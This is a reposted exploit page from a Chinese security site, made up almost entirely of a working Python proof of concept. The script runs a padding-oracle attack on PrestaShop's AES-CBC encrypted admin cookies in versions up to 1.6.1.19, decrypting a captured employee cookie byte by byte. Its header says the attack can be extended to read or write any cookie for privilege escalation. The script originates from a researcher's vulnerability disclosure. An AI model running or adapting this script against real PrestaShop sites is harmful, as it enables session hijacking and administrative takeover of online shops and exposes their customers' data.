PrestaShop < 1.6.1.19 - AES CBC Privilege Escalation Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PrestaShop < 1.6.1.19 - AES CBC Privilege Escalation Exploit

来源：https://ambionics.io/blog 作者：CharlesFol 发布时间：2018-07-19

#!/usr/bin/env python3

# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read

# Charles Fol

#

# See https://ambionics.io/blog/prestashop-privilege-escalation

#

# This POC will reveal the content of an employee's cookie.

# By modifying it one can read/write any PrestaShop cookie.

# It is a simple padding oracle implementation.

#

import requests

import urllib.parse

import base64

s = requests.Session()

"""

s.proxies = {

'http': 'localhost:8080',

'https': 'localhost:8080',

}

#"""

# Login as an employee, get your cookie and paste it here along with the URL

URL = "http://vmweb5/prestashop/admin177chuncw/"

cookie =

"PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"

# Parse blocks and size

cookie_name, cookie_value = cookie.split("=")

cookie_value = urllib.parse.unquote(cookie_value)

cookie_size = cookie_value[-6:]

cookie_value = cookie_value[:-6]

cookie_value = base64.b64decode(cookie_value)

BLOCK_SIZE = 16

def test_padding(data):

"""Returns true if the padding is correct, false otherwise.

One can easily adapt it for customer cookies using:

index.php?controller=identity

"""

data = base64.b64encode(data).decode()

data = urllib.parse.quote(data)

data = data + cookie_size

s.cookies[cookie_name] = data

r = s.get(URL, allow_redirects=False)

s.cookies.clear()

return 'AdminLogin' not in r.headers.get('Location', '')

def e(msg):

print(msg)

exit(1)

if not test_padding(cookie_value):

e("Invalid cookie (1)")

elif test_padding(b"~~~~~"):

e("Invalid cookie (2)")

# Perform the padding oracle attack

result = b''

for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):

obtained = []

current_block = cookie_value[(b ) * BLOCK_SIZE:][:BLOCK_SIZE]

precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]

for p in range(BLOCK_SIZE):

nb_obtained = len(obtained)

for i in range(256):

pad = nb_obtained + 1

prelude = (

b"\x00" * (BLOCK_SIZE - pad) +

bytes([i]) +

bytes([o ^ pad for o in obtained][::-1])

)

data = cookie_value + prelude + current_block

if test_padding(data):

print("Got byte #%d of block #%d: %d" % (p, b, i))

obtained.append(i ^ pad)

break

else:

e("Unable to decode position %d" % p)

# Compute the contents of the plaintext block

result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])

try:

print("COOKIE: %s" % result.decode())

except UnicodeDecodeError:

print("COOKIE: Unable to decode, wait for next block")

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告